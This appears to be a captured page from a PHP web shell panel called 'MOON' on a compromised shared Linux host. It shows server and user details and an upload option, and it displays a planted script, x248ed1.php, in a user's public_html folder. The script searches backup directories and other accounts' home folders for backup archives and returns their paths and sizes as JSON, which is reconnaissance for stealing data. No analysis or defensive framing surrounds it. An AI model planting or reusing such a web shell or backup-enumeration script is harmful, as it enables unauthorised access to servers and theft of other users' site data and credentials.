MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_auth_passthrough/2.1
System: Linux int.interweb-hosting.net 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User: elainekoch (690)
PHP: 5.4.45
Disabled: NONE
Upload Files
File: /home/elainekoch/public_html/x248ed1.php
<?php $r=[];foreach(['/backup','/backup2','/backup3','/backups','/home/backup'] as $d){  if(!is_dir($d))continue;  foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($d,FilesystemIterator::SKIP_DOTS),RecursiveIteratorIterator::SELF_FIRST) as $f){    if($f->isFile())$r[]=$f->getSize().' '.$f->getPathname();}}foreach(glob('/home/*/backup-*.tar.gz') as $f)$r[]=filesize($f).' '.$f;foreach(glob('/home/*/backups/*.tar.gz') as $f)$r[]=filesize($f).' '.$f;echo json_encode(['ok'=>1,'files'=>$r]);?>